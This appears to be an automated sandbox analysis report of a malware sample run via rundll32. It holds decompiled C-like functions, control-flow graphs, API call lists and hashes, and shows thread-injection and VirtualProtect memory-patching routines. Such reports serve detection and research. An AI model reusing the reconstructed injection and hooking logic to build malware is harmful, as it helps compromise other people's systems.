                                            0x00000000

                                            APIs
                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 049F7F2E
                                            • LoadLibraryA.KERNEL32(?), ref: 049F7FAB
                                            • GetLastError.KERNEL32 ref: 049F7FB7
                                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 049F7FEA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                            • String ID: $
                                            • API String ID: 948315288-3993045852
                                            • Opcode ID: 1f88ea66679fb4088665fb9997fc09b5fae3283e15fd55d96017d71bf55a8f43
                                            • Instruction ID: 7d67efb90f01a83c0947babc20af4b7cf1c8236f0cc14bdbd92367ab884af941
                                            • Opcode Fuzzy Hash: 1f88ea66679fb4088665fb9997fc09b5fae3283e15fd55d96017d71bf55a8f43
                                            • Instruction Fuzzy Hash: 83812C71A00205AFDB50DF98D884BEEBBF9FB48750F598139EA15E7240E774E905CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6B13 Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 283 49f6b13-49f6b45 memset CreateWaitableTimerA 284 49f6b4b-49f6ba4 _allmul SetWaitableTimer WaitForMultipleObjects 283->284 285 49f6cc6-49f6ccc GetLastError 283->285 287 49f6c2e-49f6c34 284->287 288 49f6baa-49f6bad 284->288 286 49f6cd0-49f6cda 285->286 289 49f6c35-49f6c39 287->289 290 49f6baf call 49f67e2 288->290 291 49f6bb8 288->291 292 49f6c3b-49f6c43 RtlFreeHeap 289->292 293 49f6c49-49f6c4d 289->293 296 49f6bb4-49f6bb6 290->296 295 49f6bc2 291->295 292->293 293->289 297 49f6c4f-49f6c59 CloseHandle 293->297 298 49f6bc6-49f6bcb 295->298 296->291 296->295 297->286 299 49f6bde-49f6c0b call 49f5803 298->299 300 49f6bcd-49f6bd4 298->300 304 49f6c0d-49f6c18 299->304 305 49f6c5b-49f6c60 299->305 300->299 301 49f6bd6 300->301 301->299 304->298 306 49f6c1a-49f6c25 call 49f29f2 304->306 307 49f6c7f-49f6c87 305->307 308 49f6c62-49f6c68 305->308 313 49f6c2a 306->313 309 49f6c8d-49f6cbb _allmul SetWaitableTimer WaitForMultipleObjects 307->309 308->287 311 49f6c6a-49f6c7d call 49f3f62 308->311 309->298 312 49f6cc1 309->312 311->309 312->287 313->287
                                            C-Code - Quality: 83%
                                            			E049F6B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x49fa2e0);
					_v76 = 0;
					_v80 = 0;
					L049F81CA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x49fa30c; // 0x2cc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x49fa2ec = 5;
						} else {
							_t69 = E049F67E2(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x49fa300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E049F5803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E049F29F2(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x49fa2e4);
							goto L21;
						} else {
							__eflags =  *0x49fa2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E049F3F62();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x49fa2e8);
								L21:
								L049F81CA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x49fa2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                                            0x049f6b13
                                            0x049f6b29
                                            0x049f6b2d
                                            0x049f6b32
                                            0x049f6b39
                                            0x049f6b3f
                                            0x049f6b45
                                            0x049f6ccc
                                            0x049f6b4b
                                            0x049f6b4b
                                            0x049f6b4d
                                            0x049f6b52
                                            0x049f6b53
                                            0x049f6b59
                                            0x049f6b5d
                                            0x049f6b61
                                            0x049f6b6f
                                            0x049f6b7d
                                            0x049f6b81
                                            0x049f6b83
                                            0x049f6b90
                                            0x049f6b9c
                                            0x049f6b9e
                                            0x049f6ba4
                                            0x049f6bad
                                            0x049f6bb8
                                            0x049f6bb8
                                            0x049f6baf
                                            0x049f6baf
                                            0x049f6bb6
                                            0x00000000
                                            0x00000000
                                            0x049f6bb6
                                            0x049f6bc2
                                            0x00000000
                                            0x049f6bc6
                                            0x049f6bcb
                                            0x049f6bd6
                                            0x049f6bd6
                                            0x049f6bde
                                            0x049f6be4
                                            0x049f6bec
                                            0x049f6bf5
                                            0x049f6bfc
                                            0x049f6c00
                                            0x049f6c05
                                            0x049f6c0b
                                            0x00000000
                                            0x00000000
                                            0x049f6c0d
                                            0x049f6c11
                                            0x049f6c18
                                            0x00000000
                                            0x049f6c1a
                                            0x049f6c25
                                            0x049f6c2a
                                            0x049f6c2a
                                            0x00000000
                                            0x049f6c5b
                                            0x049f6c5b
                                            0x049f6c60
                                            0x049f6c7f
                                            0x049f6c81
                                            0x049f6c86
                                            0x049f6c87
                                            0x00000000
                                            0x049f6c62
                                            0x049f6c62
                                            0x049f6c68
                                            0x00000000
                                            0x049f6c6a
                                            0x049f6c6a
                                            0x049f6c6f
                                            0x049f6c71
                                            0x049f6c76
                                            0x049f6c77
                                            0x049f6c8d
                                            0x049f6c8d
                                            0x049f6c95
                                            0x049f6ca3
                                            0x049f6ca7
                                            0x049f6cb3
                                            0x049f6cb5
                                            0x049f6cb9
                                            0x049f6cbb
                                            0x00000000
                                            0x049f6cc1
                                            0x00000000
                                            0x049f6cc1
                                            0x049f6cbb
                                            0x049f6c68
                                            0x00000000
                                            0x049f6c60
                                            0x049f6c2e
                                            0x049f6c30
                                            0x049f6c34
                                            0x049f6c35
                                            0x049f6c35
                                            0x049f6c39
                                            0x049f6c43
                                            0x049f6c43
                                            0x049f6c49
                                            0x049f6c4c
                                            0x049f6c4c
                                            0x049f6c53
                                            0x049f6c53
                                            0x049f6cda
                                            0x00000000

                                            APIs
                                            • memset.NTDLL ref: 049F6B2D
                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049F6B39
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049F6B61
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 049F6B81
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,049F2E0E,?), ref: 049F6B9C
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000), ref: 049F6C43
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000,?,?), ref: 049F6C53
                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049F6C8D
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 049F6CA7
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F6CB3
                                              • Part of subcall function 049F67E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F793D8,00000000,?,76CDF710,00000000,76CDF730), ref: 049F6831
                                              • Part of subcall function 049F67E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F79410,?,00000000,30314549,00000014,004F0053,04F793CC), ref: 049F68CE
                                              • Part of subcall function 049F67E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6BB4), ref: 049F68E0
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000,?,?), ref: 049F6CC6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                            • String ID:
                                            • API String ID: 3521023985-0
                                            • Opcode ID: f2e8e3a991fdebcc76276dc8d65035eeca02c762c0e5b1987c1ecfcdae28856d
                                            • Instruction ID: cdd2a491b952dfd5d4f56ac1489bd29b6716932ff19e0115692310b822c0297c
                                            • Opcode Fuzzy Hash: f2e8e3a991fdebcc76276dc8d65035eeca02c762c0e5b1987c1ecfcdae28856d
                                            • Instruction Fuzzy Hash: 9351AEB1508320BFD710EF159C84D9BBFECEB85324F004A2AFAA892150D775A945CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581E376 Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 316 581e376-581e397 call 58237a8 319 581e479 316->319 320 581e39d-581e39e 316->320 321 581e47f-581e48e VirtualProtect 319->321 322 581e3a0-581e3a3 320->322 323 581e404-581e40b 320->323 324 581e490-581e4a6 VirtualProtect 321->324 325 581e4ab-581e4b1 GetLastError 321->325 326 581e4d0-581e4dc call 58237e3 322->326 327 581e3a9 322->327 328 581e40d-581e414 323->328 329 581e44c-581e461 VirtualProtect 323->329 331 581e3af-581e3b6 324->331 325->326 327->331 328->329 333 581e416-581e422 328->333 329->321 330 581e463-581e477 329->330 334 581e448-581e44a VirtualProtect 330->334 335 581e3f8-581e3ff 331->335 336 581e3b8-581e3bc 331->336 333->321 338 581e424-581e431 VirtualProtect 333->338 334->321 335->326 336->335 339 581e3be-581e3da lstrlen VirtualProtect 336->339 338->321 340 581e433-581e447 338->340 339->335 341 581e3dc-581e3f6 lstrcpy VirtualProtect 339->341 340->334 341->335
                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,?,00000000,?,058017D3,?), ref: 0581E3C4
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3D6
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0581E3E5
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3F6
                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000400,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?), ref: 0581E42D
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E448
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?,?), ref: 0581E45D
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?,?), ref: 0581E48A
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E4A4
                                            • GetLastError.KERNEL32(?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E4AB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3676034644-0
                                            • Opcode ID: e657e7f43a7ed552cbef2af442d050cb90c62aee5920dd0b6bdac10139d2b8bf
                                            • Instruction ID: 39780915308ce85620dfd7564c917e35bdedecf588d82ce2f42cf6c05f65df4d
                                            • Opcode Fuzzy Hash: e657e7f43a7ed552cbef2af442d050cb90c62aee5920dd0b6bdac10139d2b8bf
                                            • Instruction Fuzzy Hash: 86411AB1900B09AFDB21DF65C844EAABFBDFB48350F048525EE56E65A0DB34E8058F64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F6D8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125threadsynchronizationinjectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 351 580f6d8-580f71d memset call 5804345 354 580f723 351->354 355 580f809-580f810 351->355 356 580f72a-580f732 354->356 355->356 357 580f816-580f819 call 580eaac 355->357 359 580f751-580f763 356->359 360 580f734-580f74b call 580cf88 356->360 361 580f81e 357->361 363 580f765-580f76c call 5805524 359->363 364 580f76f-580f786 call 581c1c2 359->364 360->359 369 580f850-580f854 360->369 365 580f84e 361->365 363->364 374 580f848 GetLastError 364->374 375 580f78c-580f790 364->375 365->369 372 580f856 369->372 373 580f85f-580f865 369->373 372->373 374->365 376 580f841-580f846 375->376 377 580f796-580f7a7 call 580572d 375->377 376->369 377->374 380 580f7ad 377->380 381 580f7b2-580f7ce WaitForSingleObject 380->381 383 580f7d0-580f7d2 381->383 384 580f7d3-580f7f6 SuspendThread call 58029b2 381->384 383->384 387 580f7f8-580f7fb 384->387 388 580f7fd-580f800 384->388 387->381 387->388 389 580f820-580f82e call 580cf88 388->389 390 580f802-580f807 388->390 392 580f830-580f83f call 580572d 389->392 390->392 392->369
                                            APIs
                                            • memset.NTDLL ref: 0580F6FB
                                              • Part of subcall function 05804345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                              • Part of subcall function 05804345: GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                              • Part of subcall function 05804345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                              • Part of subcall function 05804345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                              • Part of subcall function 05804345: FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0580F7B5
                                            • WaitForSingleObject.KERNEL32(00000064), ref: 0580F7C3
                                            • SuspendThread.KERNEL32(?), ref: 0580F7D6
                                              • Part of subcall function 0580CF88: memset.NTDLL ref: 0580D252
                                            • ResumeThread.KERNEL32(?), ref: 0580F859
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                            • String ID: v
                                            • API String ID: 2397206891-1801730948
                                            • Opcode ID: 067470f6d957c9b6e5bedd710a299e77dbe64df7077ebb021bea55f18072e82c
                                            • Instruction ID: 68564948aa6e2a145e79c0f031ae424729465a1af9dfe78902f899d52c32e8e9
                                            • Opcode Fuzzy Hash: 067470f6d957c9b6e5bedd710a299e77dbe64df7077ebb021bea55f18072e82c
                                            • Instruction Fuzzy Hash: 6441B172A00248ABDFB1AF54CC89AEE7BBAFF04300F049425FE05D2190D730DE918B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F15B9 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 93%
                                            			E049F15B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E049F3A6F(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E049F4C73(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E049F4C73(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E049F4C73(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E049F4C73(_t46);
				}
				return _t24;
			}












                                            0x049f15b9
                                            0x049f15b9
                                            0x049f15bb
                                            0x049f15bd
                                            0x049f15c4
                                            0x049f15cb
                                            0x049f15cb
                                            0x049f15d0
                                            0x049f15d3
                                            0x049f15da
                                            0x049f15e3
                                            0x049f15e7
                                            0x049f15ec
                                            0x049f15ec
                                            0x049f15ee
                                            0x049f15f3
                                            0x049f15f7
                                            0x049f15fc
                                            0x049f15fc
                                            0x049f15fe
                                            0x049f1603
                                            0x049f1607
                                            0x049f160c
                                            0x049f160c
                                            0x049f160e
                                            0x049f1619
                                            0x049f161c
                                            0x049f161c
                                            0x049f161e
                                            0x049f1623
                                            0x049f1626
                                            0x049f1626
                                            0x049f1628
                                            0x049f162f
                                            0x049f1632
                                            0x049f1637
                                            0x049f163a
                                            0x049f163a
                                            0x049f163d
                                            0x049f1642
                                            0x049f1645
                                            0x049f1645
                                            0x049f164a
                                            0x049f164e
                                            0x049f1651
                                            0x049f1651
                                            0x049f1656
                                            0x049f165b
                                            0x00000000
                                            0x049f165e
                                            0x049f1665

                                            APIs
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F15E7
                                            • InternetCloseHandle.WININET(?), ref: 049F15EC
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F15F7
                                            • InternetCloseHandle.WININET(?), ref: 049F15FC
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F1607
                                            • InternetCloseHandle.WININET(?), ref: 049F160C
                                            • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,049F53E9,?,?,00000000,00000000,76CC81D0), ref: 049F161C
                                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,049F53E9,?,?,00000000,00000000,76CC81D0), ref: 049F1626
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                            • String ID:
                                            • API String ID: 2172891992-0
                                            • Opcode ID: dcb28826c57bf6c1e84a60a5cd946c52f49d2eff64ab49bb3e1e7331cf3239a5
                                            • Instruction ID: 85a65c2797f40622f3520460cda7424b0ed92d2e17dd5d2cc54079b9551ae1f5
                                            • Opcode Fuzzy Hash: dcb28826c57bf6c1e84a60a5cd946c52f49d2eff64ab49bb3e1e7331cf3239a5
                                            • Instruction Fuzzy Hash: BF112E76600648ABC630AFAAEC85C5BB7EEEF543443590D39F256D3520C734FC448BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05817DF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0580A0F2: VirtualProtect.KERNEL32(00000000,00000000,00000040,05801765,?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A117
                                              • Part of subcall function 0580A0F2: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A11F
                                              • Part of subcall function 0580A0F2: VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A136
                                              • Part of subcall function 0580A0F2: VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,05801765,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A15B
                                            • GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844,00000002,00000000,00000001,?,?,?), ref: 05817F4C
                                              • Part of subcall function 058150C5: lstrlen.KERNEL32(?,?,?,?,05801765), ref: 058150FD
                                              • Part of subcall function 058150C5: lstrcpy.KERNEL32(00000000,?), ref: 05815114
                                              • Part of subcall function 058150C5: StrChrA.SHLWAPI(00000000,0000002E,?,?,05801765), ref: 0581511D
                                              • Part of subcall function 058150C5: GetModuleHandleA.KERNEL32(00000000,?,?,05801765), ref: 0581513B
                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,05801765,00000000,00000004,?,00000000,?), ref: 05817EC9
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,00000000,05801765,00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844), ref: 05817EE4
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 05817F09
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 05817F27
                                              • Part of subcall function 0580A0F2: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A164
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                            • String ID:
                                            • API String ID: 899430048-3916222277
                                            • Opcode ID: 689d560e28fda40c785d51aba9271c9b556b57789002e5c877eefbcce9a935db
                                            • Instruction ID: b4ed49c224942ad6ef5c156b88d423c3a645f1d47540eecafafc9fa93ed7e7d2
                                            • Opcode Fuzzy Hash: 689d560e28fda40c785d51aba9271c9b556b57789002e5c877eefbcce9a935db
                                            • Instruction Fuzzy Hash: 83413771900619AFDB11DF69C849AAABFB8FF48310F008119ED15EB250D734AE91CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05813D88 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 513 5813d88-5813dc7 call 58144a5 VirtualAlloc 516 5813e98 513->516 517 5813dcd-5813dd8 call 58144a5 513->517 519 5813ea0-5813ea2 516->519 520 5813ddd-5813de3 517->520 521 5813eb2-5813ebd 519->521 522 5813ea4-5813eac VirtualFree 519->522 523 5813de5-5813de9 520->523 524 5813e0b-5813e0d 520->524 522->521 523->524 526 5813deb-5813e09 VirtualFree VirtualAlloc 523->526 524->516 525 5813e13-5813e17 524->525 525->516 527 5813e19-5813e24 525->527 526->517 526->524 527->519 528 5813e26 527->528 529 5813e2c-5813e39 528->529 530 5813e75-5813e8f 529->530 531 5813e3b-5813e44 lstrcmpi 529->531 530->519 533 5813e91-5813e96 530->533 531->530 532 5813e46-5813e51 StrChrA 531->532 534 5813e61-5813e71 532->534 535 5813e53-5813e5f lstrcmpi 532->535 533->519 534->529 536 5813e73 534->536 535->530 535->534 536->519
                                            APIs
                                              • Part of subcall function 058144A5: GetProcAddress.KERNEL32(?,00000318), ref: 058144CA
                                              • Part of subcall function 058144A5: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 058144E6
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813DC1
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05813EAC
                                              • Part of subcall function 058144A5: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 05814650
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05813DF7
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813E03
                                            • lstrcmpi.KERNEL32(?,00000000), ref: 05813E40
                                            • StrChrA.SHLWAPI(?,0000002E), ref: 05813E49
                                            • lstrcmpi.KERNEL32(?,00000000), ref: 05813E5B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
